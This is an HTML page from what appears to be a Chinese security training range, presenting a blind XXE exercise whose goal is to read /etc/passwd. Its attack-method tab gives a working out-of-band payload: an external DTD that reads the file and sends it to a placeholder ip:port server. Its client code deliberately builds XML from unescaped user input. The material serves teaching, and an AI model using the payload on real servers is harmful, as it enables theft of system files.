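<!doctype html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <!-- The title was empty; reuse the heading the body shows in its first blockquote. -->
    <title>XXE 无回显</title>
    <meta name="renderer" content="webkit">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport"
          content="width=device-width,user-scalable=yes, minimum-scale=0.4, initial-scale=0.8,target-densitydpi=low-dpi">
    <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">
    <link rel="stylesheet" href="../../../statics/xadmin/css/font.css">
    <link rel="stylesheet" href="../../../statics/xadmin/css/xadmin.css">
    <link rel="stylesheet" href="../../../statics/ceber/css/mardown-css-jwsky.css">
    <link rel="stylesheet" href="../../../statics/ceber/css/highlight/arduino-light.css">


    <!-- These scripts must stay synchronous (no defer/async): the inline script at the end of
         the page calls $, layui, showdown and hljs while the document is still being parsed. -->
    <script src="../../../statics/xadmin/js/jquery.min.js"></script>
    <script src="../../../statics/xadmin/lib/layui/layui.js" charset="utf-8"></script>
    <script src="../../../statics/ceber/js/showdown.min.js" charset="utf-8"></script>
    <script src="../../../statics/ceber/js/ceber.js" charset="utf-8"></script>
    <script src="../../../statics/ceber/js/highlight.pack.js" charset="utf-8"></script>


    <style>
        /* layui tab body: drop the default side padding, keep a little space above the content */
        .layui-tab-content {
            padding: 0px;
            padding-top: 10px;
        }

        input {
            margin-bottom: 10px;
        }
    </style>
</head>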
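<body>
<div class="x-body layui-anim layui-anim-up">
    <blockquote class="layui-elem-quote">XXE 无回显</blockquote>
    <fieldset class="layui-elem-field">
        <legend>题目区</legend>
        <div class="layui-field-box">
            <div class="layui-row" style="vertical-align:bottom">
                <!-- Never submitted natively: the button is type="button" and ceberSubmitXXE()
                     posts the XML built by getXml() with $.ajax. That call targets
                     /ceber-range/xxe/xxe2 whereas this action says /xxe1; keep the two in sync
                     with the backend. "contentType" is a custom attribute, not an HTML one. -->
                <form class="layui-form" method="POST" name="form" contentType="application/xml"
                      action="/ceber-range/xxe/xxe1">
                    <input type="hidden" name="commentXml" id="commentXml">
                    <input type="text" name="commentStr" id="commentStr" placeholder="请输入留言" aria-label="留言"
                           autocomplete="off" class="layui-input">
                    <button type="button" class="layui-btn layui-btn-mini" onclick="ceberSubmitXXE(this);">发布</button>
                </form>
            </div>
            <div class="layui-row" id="comment-div"></div>
            <!-- Result rows: ceberSubmitXXE() writes the reply's code/message, body, hit and bak here. -->
            <div class="layui-row" id="rs-message"></div>
            <div class="layui-row" id="rs-body"></div>
            <div class="layui-row" id="rs-hit"></div>
            <div class="layui-row" id="rs-bak"></div>
            <div class="layui-row" id="rs-bak1111">
                    <pre><code class="javascript">
$(document).ready(function() {
$('pre code').each(function(i, block) {
    hljs.highlightBlock(block);
});
});
                    </code></pre>
            </div>
        </div>
    </fieldset>
    <fieldset class="layui-elem-field">
        <legend>解题区</legend>
        <div class="layui-tab layui-field-box">
            <ul class="layui-tab-title">
                <li class="layui-this">描述</li>
                <li>提示</li>
                <li>源代码</li>
                <li>攻击方法</li>
                <li>防御</li>
            </ul>
            <!-- The placeholder text of each item is replaced by the rendered markdown from the
                 matching <code id="…_source"> element below once the page script runs. -->
            <div class="layui-tab-content">
                <div class="layui-tab-item layui-show" id="mubiao">描述</div>
                <div class="layui-tab-item" id="tishi">提示</div>
                <div class="layui-tab-item" id="yuandaima">源代码</div>
                <div class="layui-tab-item" id="gongjifangfa">攻击方法</div>
                <div class="layui-tab-item" id="fangyu">防御</div>
            </div>
        </div>
    </fieldset>

    <!-- Tab sources. Each <code id="X_source"> wraps a <script type="text/html"> whose raw text
         is markdown; the page script converts it with showdown and writes the result into #X.
         The loader slices a fixed 48-character prefix off the wrapper's innerHTML (the
         47-character script opener plus one newline), so the opener must directly follow the
         wrapper tag on the same line and the markdown must start on the next line at column 0
         (markdown treats 4+ leading spaces as a code block). The previous revision had these
         wrappers split across lines ("< code", "<" then "/code>"), which the HTML parser reads
         as plain text, so #tishi_source and the later wrappers did not exist as elements. -->
    <code id="mubiao_source" style="display:none"><script type='text/html' style='display:block'>
读取/etc/passwd文件内容
    </script></code>

    <code id="tishi_source" style="display:none"><script type='text/html' style='display:block'>

    </script></code>

    <!-- 源代码 tab: empty in this revision. -->
    <code id="yuandaima_source" style="display:none"><script type='text/html' style='display:block'>

    </script></code>

    <code id="gongjifangfa_source" style="display:none"><script type='text/html' style='display:block'>
一个文件 attack.dtd
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://ip:port/?text=%file;'>">
%all;
```

这样调用此 dtd 文件
```xml
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://127.0.0.1:8000/attack.dtd">
%remote;
]>
<comment>
  <text>test&send;</text>
</comment>
```

然后就可以在ip:port服务器的日志里看到/etc/passwd文件的内容。

从上面的利用代码可以看到，xxe可以使用url来引用外部实体，如果这个url是一个精心构造的payload，那么这个url所在的服务器就会被攻击。
    </script></code>

    <!-- 防御 tab: empty in this revision. The mitigation to document here is disabling DTD /
         external-entity resolution in the server-side XML parser that handles this request. -->
    <code id="fangyu_source" style="display:none"><script type='text/html' style='display:block'>

    </script></code>
    <blockquote class="layui-elem-quote layui-quote-nm">持续集成</blockquote>
</div>
</body>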

<script>
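    $(function () {
        //加载弹出层 — expose layui's layer/element modules as globals. window.* makes the
        // global assignment explicit (the previous code created implicit globals).
        layui.use(['form', 'element'],
            function () {
                window.layer = layui.layer;
                window.element = layui.element;
            });
        var converter = new showdown.Converter();
        // Each tab has a hidden <code id="<tab>_source"> wrapping a <script type="text/html">
        // whose raw text is markdown. Read that script's text directly. The previous
        // .html().substr(48) relied on the 47-character <script …> opener plus one newline
        // being the first thing inside the wrapper, and threw a TypeError as soon as a wrapper
        // was missing (jQuery's html() returns undefined for an empty set); a missing or empty
        // source now just renders an empty tab.
        ['mubiao', 'tishi', 'yuandaima', 'gongjifangfa', 'fangyu'].forEach(function (tab) {
            var markdown = $("#" + tab + "_source").children("script").html() || "";
            $("#" + tab).html(converter.makeHtml(markdown));
        });
    });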

    // Once the DOM is ready, run highlight.js over every <pre><code> block on the page.
    $(function () {
        $("pre code").each(function (_, codeBlock) {
            hljs.highlightBlock(codeBlock);
        });
    });

    /**
     * Builds the XML document that ceberSubmitXXE() posts.
     *
     * The value of #commentStr is inserted into <text> without any escaping. That is the
     * deliberate weak spot of this exercise (whatever is typed reaches the server-side parser
     * unchanged); a real client would escape the value or build the document with a serializer.
     *
     * @returns {string} the XML text, with no whitespace between the elements.
     */
    function getXml() {
        var comment = $("#commentStr").val();
        var pieces = [
            '<?xml version="1.0"?>',
            '<comment>',
            '  <text>' + comment + '</text>',
            '</comment>'
        ];
        return pieces.join('');
    }

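    /**
     * Click handler of the 发布 button: posts the XML built by getXml() and writes the
     * reply's fields into the rs-* rows.
     *
     * @param {HTMLElement} e the clicked button (passed as `this` from the onclick attribute).
     *        Kept for interface compatibility; the form it belongs to is not consulted because
     *        the URL, method and content type below are fixed.
     * @returns {boolean} always false (irrelevant for a type="button" element, kept for callers).
     */
    function ceberSubmitXXE(e) {
        // NOTE: the form's action is /ceber-range/xxe/xxe1 but the request goes to /xxe2 —
        // confirm with the backend which endpoint is intended. The earlier form walk that read
        // action/method/contentType never applied its results (and its loop condition compared
        // tagName against lowercase "form", which can never match), so it was removed.
        $.ajax({
            url: "/ceber-range/xxe/xxe2",
            method: "POST",
            contentType: "application/xml",
            data: getXml(),
            success: function (data) {
                console.log(data);
                var rs = data; // local now; it used to leak as an implicit global
                $("#rs-message").html(rs.code + " " + rs.message);
                // body/hit/bak are inserted as HTML. If any of these fields echoes the
                // submitted comment or other parser output, render it with .text() instead,
                // otherwise the reply can inject markup into this page.
                $("#rs-body").html(rs.body);
                $("#rs-hit").html(rs.hit);
                $("#rs-bak").html(rs.bak);
                // #comment-div is a <div>, so .val('') does nothing; presumably this was meant
                // to clear #commentStr — confirm before changing.
                $("#comment-div").val('');
            },
            error: function (jqXHR, textStatus, errorThrown) {
                /* error handling: log the XHR plus the status and exception strings */
                console.error(jqXHR);
                console.error(textStatus);
                console.error(errorThrown);
            }
        });
        return false;
    }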

</script>
</html>